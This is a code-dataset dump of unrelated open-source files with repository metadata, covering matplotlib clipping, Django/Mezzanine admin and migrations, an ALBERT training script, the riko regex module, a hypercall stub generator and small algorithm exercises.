] | permissive | AdarshSai/Final_Project | 433009a2f416e894ee3be85cd9317cb8e8df5516 | f966834ca72dd232102ed500ef47ef2b3bdbed5b | refs/heads/main | 2023-01-23T12:21:41.342074 | 2020-11-19T22:24:15 | 2020-11-19T22:24:15 | 308,898,012 | 0 | 1 | MIT | 2020-11-19T22:24:17 | 2020-10-31T14:19:58 | Python | UTF-8 | Python | false | false | 3,895 | py | import numpy as np
from math import degrees
from matplotlib import cbook
import math
def atan2(dy, dx):
if dx == 0 and dy == 0:
cbook._warn_external("dx and dy are 0")
return 0
else:
return math.atan2(dy, dx)
# FIXME : The current algorithm seems to return incorrect angle when the line
# ends at the boundary.
def clip(xlines, ylines, x0, clip="right", xdir=True, ydir=True):
clipped_xlines = []
clipped_ylines = []
_pos_angles = []
xsign = 1 if xdir else -1
ysign = 1 if ydir else -1
for x, y in zip(xlines, ylines):
if clip in ["up", "right"]:
b = (x < x0).astype("i")
db = b[1:] - b[:-1]
else:
b = (x > x0).astype("i")
db = b[1:] - b[:-1]
if b[0]:
ns = 0
else:
ns = -1
segx, segy = [], []
for (i,) in np.argwhere(db):
c = db[i]
if c == -1:
dx = (x0 - x[i])
dy = (y[i+1] - y[i]) * (dx / (x[i+1] - x[i]))
y0 = y[i] + dy
clipped_xlines.append(np.concatenate([segx, x[ns:i+1], [x0]]))
clipped_ylines.append(np.concatenate([segy, y[ns:i+1], [y0]]))
ns = -1
segx, segy = [], []
if dx == 0. and dy == 0:
dx = x[i+1] - x[i]
dy = y[i+1] - y[i]
a = degrees(atan2(ysign*dy, xsign*dx))
_pos_angles.append((x0, y0, a))
elif c == 1:
dx = (x0 - x[i])
dy = (y[i+1] - y[i]) * (dx / (x[i+1] - x[i]))
y0 = y[i] + dy
segx, segy = [x0], [y0]
ns = i+1
if dx == 0. and dy == 0:
dx = x[i+1] - x[i]
dy = y[i+1] - y[i]
a = degrees(atan2(ysign*dy, xsign*dx))
_pos_angles.append((x0, y0, a))
if ns != -1:
clipped_xlines.append(np.concatenate([segx, x[ns:]]))
clipped_ylines.append(np.concatenate([segy, y[ns:]]))
return clipped_xlines, clipped_ylines, _pos_angles
def clip_line_to_rect(xline, yline, bbox):
x0, y0, x1, y1 = bbox.extents
xdir = x1 > x0
ydir = y1 > y0
if x1 > x0:
lx1, ly1, c_right_ = clip([xline], [yline], x1,
clip="right", xdir=xdir, ydir=ydir)
lx2, ly2, c_left_ = clip(lx1, ly1, x0,
clip="left", xdir=xdir, ydir=ydir)
else:
lx1, ly1, c_right_ = clip([xline], [yline], x0,
clip="right", xdir=xdir, ydir=ydir)
lx2, ly2, c_left_ = clip(lx1, ly1, x1,
clip="left", xdir=xdir, ydir=ydir)
if y1 > y0:
ly3, lx3, c_top_ = clip(ly2, lx2, y1,
clip="right", xdir=ydir, ydir=xdir)
ly4, lx4, c_bottom_ = clip(ly3, lx3, y0,
clip="left", xdir=ydir, ydir=xdir)
else:
ly3, lx3, c_top_ = clip(ly2, lx2, y0,
clip="right", xdir=ydir, ydir=xdir)
ly4, lx4, c_bottom_ = clip(ly3, lx3, y1,
clip="left", xdir=ydir, ydir=xdir)
c_left = [((x, y), (a + 90) % 180 - 90) for x, y, a in c_left_
if bbox.containsy(y)]
c_bottom = [((x, y), (90 - a) % 180) for y, x, a in c_bottom_
if bbox.containsx(x)]
c_right = [((x, y), (a + 90) % 180 + 90) for x, y, a in c_right_
if bbox.containsy(y)]
c_top = [((x, y), (90 - a) % 180 + 180) for y, x, a in c_top_
if bbox.containsx(x)]
return list(zip(lx4, ly4)), [c_left, c_bottom, c_right, c_top]
| [
"adarshsaig@gmail.com"
] | adarshsaig@gmail.com |
d264afccd70fdf9c18c2efb1cf3cc64e43bb66bf | 8b56726a0e92d1d9cdb0516a7ba441927a6f934c | /mezzanine_slides/admin.py | c75871a2726c7d7202c494ec7cf7142dc3e42e02 | [
"BSD-2-Clause"
] | permissive | kklimonda/mezzanine-slides | bf360ece7a576af40c9eee9cc3e3c3a586920bb3 | 6eea964c3cea7e7b9cd2e4ea4df87e02904b2bf8 | refs/heads/master | 2021-01-18T13:18:52.982969 | 2014-03-31T12:45:37 | 2014-03-31T12:45:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,335 | py | from copy import deepcopy
from django.contrib import admin
from django.conf import settings
from mezzanine.pages.models import RichTextPage
from mezzanine.core.admin import TabularDynamicInlineAdmin
from mezzanine.pages.admin import PageAdmin
from mezzanine.forms.admin import FormAdmin
from mezzanine.galleries.admin import GalleryAdmin
if "cartridge.shop" in settings.INSTALLED_APPS:
from cartridge.shop.models import Category
from cartridge.shop.admin import CategoryAdmin
cartridge = True
else:
cartridge = False
from .models import Slide
"""
We do what we do here instead of just attaching it to PageAdmin because more
things then just pages inherit PageAdmin and if we just inject it into PageAdmin
I've had some very bad things happen. Thus I inject it into each page type
individually in a way that best suits it.
"""
class SlideInline(TabularDynamicInlineAdmin):
model = Slide
class RichTextPageAdmin(PageAdmin):
inlines = (SlideInline,)
admin.site.unregister(RichTextPage)
admin.site.register(RichTextPage, RichTextPageAdmin)
FormAdmin.inlines += (SlideInline,)
GalleryAdmin.inlines += (SlideInline,)
if cartridge:
class CategoryAdminInline(CategoryAdmin):
inlines = (SlideInline,)
admin.site.unregister(Category)
admin.site.register(Category, CategoryAdminInline)
| [
"isaac@bythewood.me"
] | isaac@bythewood.me |
4f639435ccaf5bbdd3a526cbc08cbd897e67d235 | 8968a2696cea58d7b04cb59c2525e89cf6f88a0a | /train_albert_en.py | 975c64c91313071f1de25f3be32ad0b6ee582502 | [] | no_license | Vottivott/swedsquad | a739c7aa938a5db381e2bda9e047c8db93390a90 | 5ed279f166d26b45228501012fbb8817d1c5ae11 | refs/heads/master | 2020-09-26T21:02:36.342548 | 2020-02-09T01:39:38 | 2020-02-09T01:39:38 | 226,342,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | import run_squad_v2_3
args = """--model_type albert
--model_name_or_path albert-xxlarge-v2
--do_train
--do_eval
--version_2_with_negative
--train_file train-v2.0.json
--predict_file dev-v2.0.json
--learning_rate 3e-5
--num_train_epochs 2
--max_seq_length 384
--doc_stride 128
--output_dir albert_en
--per_gpu_eval_batch_size=3
--per_gpu_train_batch_size=3
--overwrite_cache
--save_steps=10000
""".split() # --eval_all_checkpoints
import os
import __main__ as main
print("Script: " + os.path.basename(main.__file__))
print(args)
results = run_squad_v2_3.main(args=args)
import json
import datetime
date = datetime.datetime.now().strftime("%I.%M.%S.%f %p on %B %d, %Y")
outname = "results " + os.path.basename(main.__file__)[:-3] + " " + date
with open(outname + ".json", "w") as out:
json.dump(results, out)
print(args)
print("Script: " + os.path.basename(main.__file__)) | [
"hannes.von.essen@gmail.com"
] | hannes.von.essen@gmail.com |
9c282bcc9395d5eda1043828a607d89c7e437cc1 | 2d196f23088be902bc7eba837c1bc7d238d3a4dc | /takmyo_app/migrations/0016_auto_20190701_1939.py | 6b08d6a79f663352837bb158cdd003025f4efcb8 | [] | no_license | SimJunSik/takmyo | 9015bb6359e55b2cc6a3bda6a3b60c3a74c5293e | 719c2953e46be0fd35d18ed61137e54510854234 | refs/heads/master | 2020-05-31T16:07:54.001559 | 2019-07-10T13:22:27 | 2019-07-10T13:22:27 | 190,373,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,519 | py | # Generated by Django 2.1.4 on 2019-07-01 19:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('takmyo_app', '0015_auto_20190630_2023'),
]
operations = [
migrations.AddField(
model_name='catsitterreview',
name='catee',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='catee_reviews', to='takmyo_app.Catee'),
),
migrations.AlterField(
model_name='cateetocatsitterform',
name='place',
field=models.CharField(choices=[('visit', 'Visit'), ('consignment', 'Consignment')], default='', max_length=20),
),
migrations.AlterField(
model_name='cateetocatsitterform',
name='state',
field=models.CharField(choices=[('unrecognized', 'Unrecognized'), ('progress', 'Progress'), ('recognized', 'Recognized')], default='', max_length=50),
),
migrations.AlterField(
model_name='catsitter',
name='available_day',
field=models.CharField(choices=[('both', 'Both'), ('weekday', 'Weekday'), ('weekend', 'Weekend')], default='', max_length=10),
),
migrations.AlterField(
model_name='catsitter',
name='available_place',
field=models.CharField(choices=[('visit', 'Visit'), ('both', 'Both'), ('consignment', 'Consignment')], default='', max_length=20),
),
migrations.AlterField(
model_name='catsitter',
name='available_weekday_time',
field=models.CharField(choices=[('am', 'Am'), ('both', 'Both'), ('pm', 'Pm')], default='', max_length=10),
),
migrations.AlterField(
model_name='catsitter',
name='available_weekend_time',
field=models.CharField(choices=[('am', 'Am'), ('both', 'Both'), ('pm', 'Pm')], default='', max_length=10),
),
migrations.AlterField(
model_name='catsitterreview',
name='catsitter',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='catsitter_reviews', to='takmyo_app.Catsitter'),
),
migrations.AlterField(
model_name='notification',
name='category',
field=models.CharField(choices=[('form', 'Form'), ('review', 'Review')], max_length=30, null=True),
),
]
| [
"wnstlr24@naver.com"
] | wnstlr24@naver.com |
95faa95eeff801f7dab139c5085f5900338d891f | 41d4f53b7f23639c1e2bbf75f06b77b544b5e8ca | /docs/fragments/feature-engineering-guide-second-feature.py | e70345c620ad6fb8637ac8f6c9d859035d9a1e71 | [
"MIT"
] | permissive | fagan2888/ballet | d010ad5e8158417cd75b73fe67c758e6423cbb35 | 38b156e04e5ae1497e943a8c954606c9a9b5dd83 | refs/heads/master | 2023-03-05T13:41:32.953107 | 2021-02-02T16:58:37 | 2021-02-02T16:58:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | from ballet import Feature
from ballet.eng.sklearn import SimpleImputer
input = ["Lot Frontage"]
transformer = SimpleImputer(strategy="mean")
name = "Imputed Lot Frontage"
feature = Feature(input=input, transformer=transformer, name=name)
| [
"micahjsmith@gmail.com"
] | micahjsmith@gmail.com |
a8afe8fe90cb44885e1a8de0926880ca20e883b6 | 36957a9ce540846d08f151b6a2c2d582cff1df47 | /VR/Python/Python36/Lib/site-packages/django/contrib/messages/storage/fallback.py | d1e59e7381a074e84dc617160fe1188be756bcf0 | [] | no_license | aqp1234/gitVR | 60fc952307ef413e396d31e0d136faffe087ed2b | e70bd82c451943c2966b8ad1bee620a0ee1080d2 | refs/heads/master | 2022-12-29T15:30:12.540947 | 2020-10-07T15:26:32 | 2020-10-07T15:26:32 | 290,163,043 | 0 | 1 | null | 2020-08-25T09:15:40 | 2020-08-25T08:47:36 | C# | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:21bcb2660f1c4d4fb5f5979183a2e774b7d12b44a87af0f0a8ab6bab3855a7a7
size 2095
| [
"aqp1234@naver.com"
] | aqp1234@naver.com |
511ea27f7502976ed688dd2cdd273ad0cfd53fbe | e815fd9fbc703ce43d94fba6e53c86b898e32977 | /llia/synths/controlmixer/controlmixer_proxy.py | 33161f517185689a07627bddbc820d2b9f087313 | [] | no_license | kaos/Llia | 0cdedc13d84ce86034287fba00ec0b169fbd87b1 | b2aaa163c4ada3b446a7c3701e3f05c0f8406d6e | refs/heads/master | 2020-12-28T19:23:48.480608 | 2017-03-27T05:51:14 | 2017-03-27T05:51:14 | 64,940,263 | 0 | 0 | null | 2016-08-04T14:13:13 | 2016-08-04T14:13:13 | null | UTF-8 | Python | false | false | 1,651 | py | # llia.synths.controlmixer.ghost_proxy
from __future__ import print_function
import llia.constants
from llia.gui.pallet import default_pallet, Pallet
from llia.synth_proxy import SynthSpecs, SynthProxy
from llia.synths.controlmixer.controlmixer_data import program_bank, pp
specs = SynthSpecs("ControlMixer")
class ControlmixerProxy(SynthProxy):
def __init__(self, app):
super(ControlmixerProxy, self).__init__(app, specs, program_bank)
self.app = app
def create_subeditors(self):
pass
gui = self.app.config["gui"].upper()
if gui == "TK":
from llia.synths.controlmixer.tk.editor import create_editor
appwin = self.app.main_window()
parent_editor = appwin[self.sid]
create_editor(parent_editor)
controlmixer_pallet = Pallet(default_pallet)
controlmixer_pallet["SLIDER-TROUGH"] = "#432703"
controlmixer_pallet["SLIDER-OUTLINE"] = "#42033E"
specs["constructor"] = ControlmixerProxy
specs["description"] = "Combines up to 4 control signals"
specs["keymodes"] = ("EFX", )
specs["pretty-printer"] = pp
#specs["program-generator"] =
specs["is-efx"] = True
specs["is-controller"] = True
specs["help"] = "Controlmixer"
specs["pallet"] = controlmixer_pallet
specs["control-input-buses"] = [["inbusA","null_sink"],
["inbusB","null_sink"],
["inbusC","null_sink"],
["inbusD","null_sink"]]
specs["control-output-buses"] = [["outbus","null_source"]]
print("\t%s" % specs["format"])
llia.constants.CONTROLLER_SYNTH_TYPES.append(specs["format"])
| [
"plewto@gmail.com"
] | plewto@gmail.com |
d87e6b7190ffd9f4f1c99b2383a7d2ac3e2c9173 | f36f17f00d02198c851a4fcc7680aa4a3fa2397e | /riko/modules/refind.py | d20944d580c5018a127c1e4cef366804efff1063 | [
"MIT"
] | permissive | HKCaesar/riko | c0a9fe597e137b2512c12e6444c8b4645eaf1b63 | 2ad4cb372a784dca4fbce68d71171bd8e6a0e8ae | refs/heads/master | 2020-06-17T16:35:46.594452 | 2017-05-22T17:59:39 | 2017-05-22T17:59:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,711 | py | # -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""
riko.modules.refind
~~~~~~~~~~~~~~~~~~~
Provides functions for finding text located before, after, at, or between
substrings using regular expressions, a powerful type of pattern matching.
Examples:
basic usage::
>>> from riko.modules.refind import pipe
>>> conf = {'rule': {'find': '[aiou]'}}
>>> item = {'content': 'hello world'}
>>> next(pipe(item, conf=conf))['refind'] == 'hell'
True
Attributes:
OPTS (dict): The default pipe options
DEFAULTS (dict): The default parser options
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals)
import re
import pygogo as gogo
from functools import reduce
from builtins import *
from . import processor
from riko.bado import coroutine, return_value, itertools as ait
OPTS = {
'listize': True, 'ftype': 'text', 'field': 'content', 'extract': 'rule'}
DEFAULTS = {}
logger = gogo.Gogo(__name__, monolog=True).logger
PARAMS = {
'first': lambda word, rule: re.split(rule.find, word, maxsplit=1),
'last': lambda word, rule: re.split(rule.find, word)}
AT_PARAMS = {
'first': lambda word, rule: re.search(rule.find, word),
'last': lambda word, rule: re.findall(rule.find, word)}
OPS = {
'before': lambda splits, rule: rule.find.join(splits[:len(splits) - 1]),
'after': lambda splits, rule: splits[-1],
'at': lambda splits, rule: splits,
}
def reducer(word, rule):
param = rule.param or 'first'
default = rule.default or ''
if rule.location == 'at':
result = AT_PARAMS.get(param, AT_PARAMS['first'])(word, rule)
if result and param == 'first':
splits = result.group(0)
elif result and param == 'last':
splits = result[-1]
else:
splits = default
else:
splits = PARAMS.get(param, PARAMS['first'])(word, rule)
return OPS.get(rule.location, OPS['before'])(splits, rule).strip()
@coroutine
def async_parser(word, rules, skip=False, **kwargs):
""" Asynchronously parses the pipe content
Args:
word (str): The string to transform
rules (List[obj]): the parsed rules (Objectify instances).
skip (bool): Don't parse the content
kwargs (dict): Keyword arguments
Kwargs:
assign (str): Attribute to assign parsed content (default: refind)
stream (dict): The original item
Returns:
Deferred: twisted.internet.defer.Deferred item
Examples:
>>> from riko.bado import react
>>> from riko.bado.mock import FakeReactor
>>> from meza.fntools import Objectify
>>>
>>> def run(reactor):
... item = {'content': 'hello world'}
... conf = {'rule': {'find': '[aiou]'}}
... rule = Objectify(conf['rule'])
... kwargs = {'stream': item, 'conf': conf}
... d = async_parser(item['content'], [rule], **kwargs)
... return d.addCallbacks(print, logger.error)
>>>
>>> try:
... react(run, _reactor=FakeReactor())
... except SystemExit:
... pass
...
hell
"""
if skip:
value = kwargs['stream']
else:
value = yield ait.coop_reduce(reducer, rules, word)
return_value(value)
def parser(word, rules, skip=False, **kwargs):
""" Parses the pipe content
Args:
word (str): The string to transform
rules (List[obj]): the parsed rules (Objectify instances).
skip (bool): Don't parse the content
kwargs (dict): Keyword arguments
Kwargs:
assign (str): Attribute to assign parsed content (default: refind)
stream (dict): The original item
Returns:
dict: The item
Examples:
>>> from meza.fntools import Objectify
>>>
>>> item = {'content': 'hello world'}
>>> conf = {'rule': {'find': '[aiou]'}}
>>> rule = Objectify(conf['rule'])
>>> args = item['content'], [rule], False
>>> kwargs = {'stream': item, 'conf': conf}
>>> parser(*args, **kwargs) == 'hell'
True
"""
return kwargs['stream'] if skip else reduce(reducer, rules, word)
@processor(DEFAULTS, isasync=True, **OPTS)
def async_pipe(*args, **kwargs):
"""A processor module that asynchronously finds text within the field of an
item using regex.
Args:
item (dict): The entry to process
kwargs (dict): The keyword arguments passed to the wrapper
Kwargs:
conf (dict): The pipe configuration. Must contain the key 'rule'.
rule (dict): can be either a dict or list of dicts. Must contain
the key 'find'. May contain the keys 'location' or 'param'.
find (str): The string to find.
location (str): Direction of the substring to return. Must be
either 'before', 'after', or 'at' (default: 'before').
param (str): The type of replacement. Must be either 'first'
or 'last' (default: 'first').
assign (str): Attribute to assign parsed content (default: refind)
field (str): Item attribute to operate on (default: 'content')
Returns:
Deferred: twisted.internet.defer.Deferred item with transformed content
Examples:
>>> from riko.bado import react
>>> from riko.bado.mock import FakeReactor
>>>
>>> def run(reactor):
... callback = lambda x: print(next(x)['refind'])
... conf = {'rule': {'find': '[aiou]'}}
... d = async_pipe({'content': 'hello world'}, conf=conf)
... return d.addCallbacks(callback, logger.error)
>>>
>>> try:
... react(run, _reactor=FakeReactor())
... except SystemExit:
... pass
...
hell
"""
return async_parser(*args, **kwargs)
@processor(**OPTS)
def pipe(*args, **kwargs):
"""A processor that finds text within the field of an item using regex.
Args:
item (dict): The entry to process
kwargs (dict): The keyword arguments passed to the wrapper
Kwargs:
conf (dict): The pipe configuration. Must contain the key 'rule'.
rule (dict): can be either a dict or list of dicts. Must contain
the key 'find'. May contain the keys 'location' or 'param'.
find (str): The string to find.
location (str): Direction of the substring to return. Must be
either 'before', 'after', or 'at' (default: 'before').
param (str): The type of replacement. Must be either 'first'
or 'last' (default: 'first').
assign (str): Attribute to assign parsed content (default: refind)
field (str): Item attribute to operate on (default: 'content')
Yields:
dict: an item with transformed content
Examples:
>>> conf = {'rule': {'find': '[aiou]'}}
>>> item = {'content': 'hello world'}
>>> next(pipe(item, conf=conf))['refind'] == 'hell'
True
>>> conf = {'rule': {'find': 'w', 'location': 'after'}}
>>> kwargs = {'conf': conf, 'field': 'title', 'assign': 'result'}
>>> item = {'title': 'hello world'}
>>> next(pipe(item, **kwargs))['result'] == 'orld'
True
>>> conf = {
... 'rule': [
... {'find': 'o([a-z])', 'location': 'after'}, {'find': 'd'}]}
>>> item = {'content': 'hello world'}
>>> next(pipe(item, conf=conf))['refind'] == 'l'
True
"""
return parser(*args, **kwargs)
| [
"reubano@gmail.com"
] | reubano@gmail.com |
2c3e86903090f4e9df6b6db7b7638629a05d5502 | be4d32d35fd4af3cf4ecf3736c8e879d50b8ae37 | /Python/Django/belt2_exam/belt2_exam/wsgi.py | 35143390e13c3eca0342994133978c7b178f5e20 | [] | no_license | yangluo0901/CodingDojo_Assignment | f09bbec26f87b5b276fd6ef3c77f27d13518937e | 44ccb5158b12c1656793bac76f1a7a707b147982 | refs/heads/master | 2021-10-11T21:12:14.889189 | 2019-01-29T19:52:56 | 2019-01-29T19:52:56 | 105,716,841 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | """
WSGI config for belt2_exam project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "belt2_exam.settings")
application = get_wsgi_application()
| [
"yangluo0901@gmail.com"
] | yangluo0901@gmail.com |
ef2d337b974ef2e91f0a09d2fb51bc1e027a2c04 | 361b96b81858a0f620da36ec20da0ec22fc84fec | /hypercallgen.py | 32b30daa878fe82428cbc87da17c6bb939b0f0ef | [
"BSD-2-Clause"
] | permissive | daeken/Zookeeper | 88738beaa2eb8870d746981469b5e76df6266534 | b27f4bd17af1f5e1c7bbdd4a18017458822de648 | refs/heads/master | 2021-01-17T20:06:27.984878 | 2016-06-04T22:50:30 | 2016-06-04T22:50:30 | 37,281,709 | 37 | 2 | null | 2016-05-20T15:48:30 | 2015-06-11T19:31:08 | C++ | UTF-8 | Python | false | false | 3,977 | py | from yaml import load
calls = load(file('hypercalls.yaml'))
nhc = file('NightBeliever/Hypercall.cpp', 'w')
print >>nhc, '// Automatically generated by hypercallgen.py'
print >>nhc, '#include "NightBeliever.hpp"'
print >>nhc, '#include "../Hypercalls.hpp"'
print >>nhc
nhh = file('NightBeliever/Hypercall.hpp', 'w')
print >>nhh, '// Automatically generated by hypercallgen.py'
print >>nhh, '#pragma once'
print >>nhh, '#include "NightBeliever.hpp"'
print >>nhh, '#include "HypercallSupport.hpp"'
print >>nhh
zhc = file('HypercallDispatch.cpp', 'w')
print >>zhc, '// Automatically generated by hypercallgen.py'
print >>zhc, '#include "Zookeeper.hpp"'
print >>zhc
print >>zhc, 'void hypercall_dispatch(uint32_t call, uint32_t addr) {'
print >>zhc, '\tswitch(call) {'
zhh = file('Hypercalls.hpp', 'w')
print >>zhh, '// Automatically generated by hypercallgen.py'
print >>zhh, '#pragma once'
print >>zhh
zhl = file('Hypercall.hpp', 'w')
print >>zhl, '// Automatically generated by hypercallgen.py'
print >>zhl, '#pragma once'
print >>zhl, '#include "Zookeeper.hpp"'
print >>zhl, '#include "Hypercalls.hpp"'
print >>zhl
print >>zhl, 'void hypercall_dispatch(uint32_t call, uint32_t addr);'
print >>zhl
print >>zhl, 'class Hypercall {'
print >>zhl, 'public:'
def typemap(type):
if '*' in type or type == 'thread_ep_t':
return 'uint32_t'
else:
return type
def cast(a, b):
if a == b:
return ''
return '(%s) ' % b
for i, (name, args) in enumerate(calls.items()):
args = args if args is not None else []
ret = ''
nret = ''
rettype = 'void'
if args and 'return' in args[0]:
rettype = args[0]['return']
ret = 'auto ret = %s' % (cast(typemap(rettype), 'uint32_t'))
nret = 'return %s' % (cast('uint32_t', rettype))
del args[0]
args = [(an, at, typemap(at)) for x in args for (an, at) in x.items()]
print >>zhc, '\t\tcase %i: { // %s' % (i, name)
if len(args) > 1:
print >>zhh, 'typedef struct __attribute__((packed)) hypercall_%s {' % name
for arg, type, mapped in args:
print >>zhh, '\t%s %s;' % (mapped, arg)
print >>zhh, '} hypercall_%s_t;' % name
print >>zhh
print >>zhc, '\t\t\tauto sarg = box->cpu->read_memory<hypercall_%s_t>(addr);' % (name)
print >>zhc, '\t\t\t%sbox->hypercall->%s(%s);' % (ret, name, ', '.join('sarg.' + arg for arg, _, _ in args))
if rettype != 'void':
print >>zhc, '\t\t\tbox->cpu->hv->reg(EAX, ret);'
print >>zhl, '\t%s %s(%s);' % (typemap(rettype), name, ', '.join('%s %s' % (mapped, name) for name, _, mapped in args))
print >>nhh, '%s %s(%s);' % (rettype, name, ', '.join(type for _, type, _ in args))
print >>nhc, '%s %s(%s) {' % (rettype, name, ', '.join('%s %s' % (type, name) for name, type, _ in args))
print >>nhc, '\tvolatile hypercall_%s_t _sarg;' % name
for arg, type, mapped in args:
print >>nhc, '\t_sarg.%s = %s%s;' % (arg, cast(type, mapped), arg)
print >>nhc, '\t%svmcall(%i, (uint32_t) &_sarg);' % (nret, i)
print >>nhc, '}'
print >>nhc
elif len(args) == 1:
print >>zhc, '\t\t\t%sbox->hypercall->%s(%saddr);' % (ret, name, cast('uint32_t', args[0][2]))
if rettype != 'void':
print >>zhc, '\t\t\tbox->cpu->hv->reg(EAX, ret);'
print >>zhl, '\t%s %s(%s %s);' % (typemap(rettype), name, args[0][2], args[0][0])
print >>nhh, '%s %s(%s);' % (rettype, name, args[0][1])
print >>nhc, '%s %s(%s arg) {' % (rettype, name, args[0][1])
print >>nhc, '\t%svmcall(%i, %sarg);' % (nret, i, cast(args[0][1], 'uint32_t'))
print >>nhc, '}'
print >>nhc
else:
print >>zhc, '\t\t\t%sbox->hypercall->%s();' % (ret, name)
if rettype != 'void':
print >>zhc, '\t\t\tbox->cpu->hv->reg(EAX, ret);'
print >>zhl, '\t%s %s();' % (typemap(rettype), name)
print >>nhh, '%s %s();' % (rettype, name)
print >>nhc, '%s %s() {' % (rettype, name)
print >>nhc, '\t%svmcall(%i, NULL);' % (nret, i)
print >>nhc, '}'
print >>nhc
print >>zhc, '\t\t\tbreak;'
print >>zhc, '\t\t}'
print >>zhc, '\t}'
print >>zhc, '}'
print >>zhc
print >>zhl, '};'
print >>zhl
| [
"cody.brocious@gmail.com"
] | cody.brocious@gmail.com |
ad385490ca92fa12443faef3fbd626e74dcad0cb | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /SFAjxGWk9AbfwbXFN_9.py | ec4e643e07b51a271e0aff50e66352e44bf41ae3 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | """
Create a function that will find all primes below a given number. Return the
result as a list.
### Examples
primes_below_num(5) ➞ [2, 3, 5]
primes_below_num(10) ➞ [2, 3, 5, 7]
primes_below_num(20) ➞ [2, 3, 5, 7, 11, 13, 17, 19]
### Notes
If `n` is a prime, it is included in the list.
"""
def is_prime(num):
for i in range(2, int(num ** 0.5)+1):
if num % i == 0:
return False
else:
return True
def primes_below_num(n):
return [num for num in range(2,n+1) if is_prime(num)]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
5c85dad1f51e149d019abbd4bd4632e8fb570871 | 4a73648ecd3951b802e89e83a3bd9ef5b063af3d | /python_part/Leetcode/Data Structure/BinaryTree/easy/100. Same Tree/Solution.py | c61f1ad568845f63c4619fd72896ce1389db1f89 | [] | no_license | Allen-C-Guan/Leetcode-Answer | f5f9ee1348b86da914a564b7d23bf8904d5aa27f | f6e1374ef567590fee15ba6d1d6d65891233b5e1 | refs/heads/master | 2023-08-17T18:18:00.581743 | 2021-10-10T15:24:07 | 2021-10-10T15:24:07 | 257,017,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
'''
写递归还是那个最重要思路:
在写递归的时候,一定要时刻记得,子问题已经被我的递归解决掉了。我不要去考虑如何去解决子问题的事情。我要做的就是如何利用子问题搞好当前的问题。
那么子问题到底怎么去得到? 我们只考虑递归出口处的最基本的子问题的结果就行了。其他非最基本子问题都会自然得以解决。
'''
class Solution:
def isSameTree(self, p: TreeNode, q: TreeNode) -> bool: # 递归功能判定当前位置及以下是否是相同的
if p is None and q is None: return True # 若q和p都是None,说明都到底了。而且还是相同的
if p is None or q is None: return False # 有且只有一个是None,不用继续判定了,直接就是False
return q.val == p.val and self.isSameTree(p.left,q.left) and self.isSameTree(p.right,q.right)
# 剩下的是q和p都不是none的情况 需要左右子树都是相同的,自己也相同才是相同的
| [
"54201792+Allen-C-Guan@users.noreply.github.com"
] | 54201792+Allen-C-Guan@users.noreply.github.com |
d5aec38822b3b128eeaf56abe575341e4218020a | 5917a63a6d16de893f54e86a70f5d881648112c1 | /Py1_spc-master/Lec13/main3.py | 6b43b167c5bbb78d74f14b4340ee7242ebe54db7 | [] | no_license | litded/lessons | f14e8e68577d417fc87eaca1c426f535baa04e8b | af2e0f6cae61878a833a7eebd7c2509d930ede48 | refs/heads/master | 2023-08-22T00:49:50.362770 | 2021-10-16T20:33:01 | 2021-10-16T20:33:01 | 417,940,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | """
Возвращаемые значения. Часть 2.
"""
def get_name():
name = "Alice"
return name
def get_void():
print("This function without RETURN!")
# Если функция не имеет при себе явно описанного блока return....
# то функция по умолчанию возвращает None
# Синтаксический сахар - можно написать голый return
return
if get_void() is None:
# Проверка на None
print()
ans1 = get_name()
print("From get_name():", ans1)
ans2 = get_void()
print("From get_void():", ans2)
# """
# В Java
# """
# void MyFunc(){
# } | [
"i.ivlev@westwing.ru"
] | i.ivlev@westwing.ru |
9fa5d51a54777a623a4635f83371d802bf01eef2 | 73189d4d0b39efe5864d25aff07d8338ab8f3110 | /build/geometry2-melodic-devel/tf2_ros/catkin_generated/pkg.develspace.context.pc.py | 61eafca3339558f2801d2b75f77e862900bdfb75 | [] | no_license | jungwoohan72/Multi_Robot_Search_And_Rescue | a64590a0f899682c2429400c5cb6d4d8a7d7fd99 | 3e70f9e9b895a96e045f19a05780b091c16f2e60 | refs/heads/main | 2023-07-06T14:03:58.980624 | 2021-08-01T05:15:02 | 2021-08-01T05:15:02 | 379,856,303 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/morin-sol/ME652/src/geometry2-melodic-devel/tf2_ros/include".split(';') if "/home/morin-sol/ME652/src/geometry2-melodic-devel/tf2_ros/include" != "" else []
PROJECT_CATKIN_DEPENDS = "actionlib;actionlib_msgs;geometry_msgs;message_filters;roscpp;rosgraph;tf2;tf2_msgs;tf2_py".replace(';', ' ')
